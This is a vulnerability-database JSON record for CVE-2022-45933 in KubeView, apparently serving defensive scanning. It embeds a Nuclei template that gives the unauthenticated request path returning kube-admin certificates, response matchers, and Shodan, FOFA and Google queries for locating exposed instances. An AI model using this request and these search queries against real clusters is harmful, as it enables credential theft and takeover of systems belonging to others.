{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-45933/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-45933/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-45933/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-45933/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-45933/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-45933"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-45933"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.51696,
      "kev": false,
      "percentile": 0.98897
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2022/CVE-2022-45933.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2022-45933\n\ninfo:\n  name: KubeView <=0.1.31 - Information Disclosure\n  author: For3stCo1d\n  severity: critical\n  description: |\n    KubeView through 0.1.31 is susceptible to information disclosure. An attacker can obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication and retrieves certificate files that can be used for authentication as kube-admin. An attacker can thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n  impact: |\n    Unauthenticated attackers can access Kubernetes certificate files through the unauthenticated api/scrape/kube-system endpoint, potentially obtaining kube-admin credentials and gaining complete control over the Kubernetes cluster.\n  remediation: |\n    Upgrade KubeView to a version higher than 0.1.31 to mitigate the information disclosure vulnerability (CVE-2022-45933).\n  reference:\n    - https://github.com/benc-uk/kubeview/issues/95\n    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45933\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-45933\n    - https://github.com/ARPSyndicate/kenzer-templates\n    - https://github.com/Henry4E36/POCS\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-45933\n    cwe-id: CWE-306\n    epss-score: 0.51696\n    epss-percentile: 0.98897\n    cpe: cpe:2.3:a:kubeview_project:kubeview:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: kubeview_project\n    product: kubeview\n    shodan-query:\n      - http.title:\"KubeView\"\n      - http.title:\"kubeview\"\n      - http.favicon.hash:-379154636\n    fofa-query:\n      - icon_hash=-379154636\n      - title=\"kubeview\"\n    google-query: intitle:\"kubeview\"\n  tags: cve,cve2022,kubeview,kubernetes,exposure,kubeview_project,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/scrape/kube-system\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'BEGIN CERTIFICATE'\n          - 'END CERTIFICATE'\n          - 'kubernetes.io'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402205e4cda612453bd25e32b80bdae237ebe25de7268c85115c6ab12cf5946c8620a02206dd92b1bf56e6ec9d8e58f475574d2f3bd05884db9235a672d112d41a8b814ac:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2022-45933"
}